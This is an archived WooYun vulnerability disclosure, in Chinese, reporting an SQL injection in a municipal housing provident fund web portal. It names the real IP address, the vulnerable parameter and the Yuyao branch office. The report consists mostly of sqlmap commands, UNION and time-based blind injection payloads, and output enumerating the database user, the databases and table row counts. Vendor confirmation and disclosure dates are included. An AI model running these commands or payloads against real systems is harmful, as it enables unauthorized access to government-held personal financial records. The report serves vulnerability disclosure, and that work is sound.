乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-03-23: 细节已通知厂商并且等待厂商处理中 2014-03-28: 厂商已经确认,细节仅向厂商公开 2014-04-07: 细节向核心白帽子及相关领域专家公开 2014-04-17: 细节向普通白帽子公开 2014-04-27: 细节向实习白帽子公开 2014-05-07: 细节向公众公开
某市住房公积金管理平台SQL注射
宁波市住房公积金管理中心余姚分中心
http://221.136.78.209:7001/wscx/
注射点:
http://221.136.78.209:7001/wscx/zfbzgl/zfbzsq/login_hidden.jsp?password=123456&sfzh=admin
其中,sfzh参数存在SQL注射漏洞。
sqlmap.py -u "http://221.136.78.209:7001/wscx/zfbzgl/zfbzsq/login_hidden.jsp?password=123456&sfzh=admin" --current-db --current-user --dbs
---Place: GETParameter: sfzh Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: password=123456&sfzh=admin' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(121)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR(65)+CHAR(76)+CHAR(119)+CHAR(72)+CHAR(118)+CHAR(115)+CHAR(90)+CHAR(118)+CHAR(100)+CHAR(87)+CHAR(113)+CHAR(104)+CHAR(102)+CHAR(109)+CHAR(113)-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: password=123456&sfzh=admin' WAITFOR DELAY '0:0:5'-----web application technology: JSPback-end DBMS: Sybasecurrent user: 'jtpsoftadmin'current database: 'gjjmx12'available databases [7]:[*] gjjmx12[*] gjjmx12_zgkl[*] master[*] model[*] sybsystemdb[*] sybsystemprocs[*] tempdb
sqlmap.py -u "http://221.136.78.209:7001/wscx/zfbzgl/zfbzsq/login_hidden.jsp?password=123456&sfzh=admin" --count
Database: gjjmx12_zgkl+----------------------------+---------+| Table | Entries |+----------------------------+---------+| dbo.gzzgklk | 41626 || dbo.bm_glyyh | 1 |+----------------------------+---------+Database: sybsystemprocs+----------------------------+---------+| Table | Entries |+----------------------------+---------+| dbo.spt_server_info | 30 || dbo.spt_datatype_info | 27 || dbo.spt_jdatatype_info | 27 || dbo.spt_datatype_info_ext | 9 |+----------------------------+---------+Database: master+----------------------------+---------+| Table | Entries |+----------------------------+---------+| dbo.syblicenseslog | 1843 || dbo.spt_values | 1711 || dbo.spt_mda | 186 || dbo.spt_ijdbc_mda | 175 || dbo.jdbc_function_escapes | 89 || dbo.ijdbc_function_escapes | 88 || dbo.spt_ijdbc_conversion | 20 || dbo.spt_jdbc_conversion | 20 || dbo.spt_limit_types | 4 || dbo.spt_ijdbc_table_types | 3 || dbo.spt_jdbc_table_types | 3 || dbo.spt_jtext | 1 || dbo.spt_monitor | 1 |+----------------------------+---------+Database: gjjmx12+----------------------------+---------+| Table | Entries |+----------------------------+---------+| dbo.gzhkk | 610733 || dbo.gzbjk | 424578 || dbo.gzpzk | 116074 || dbo.gzjbk | 61715 || dbo.gzzqk | 35066 || dbo.gzshk | 22439 || dbo.gzdkk | 14975 || dbo.module_func | 320 || dbo.menu_item | 254 || dbo.tmp_dsr | 114 || dbo.gzlsk | 18 || dbo.bm_hkfs | 9 || dbo.gzllk | 6 || dbo.app_role | 3 || dbo.user_role | 3 || dbo.app_user | 2 || dbo.bm_a005 | 2 || dbo.gzndk | 1 |+----------------------------+---------+
安全测试,绝未脱裤
危害等级:中
漏洞Rank:10
确认时间:2014-03-28 15:14
暂无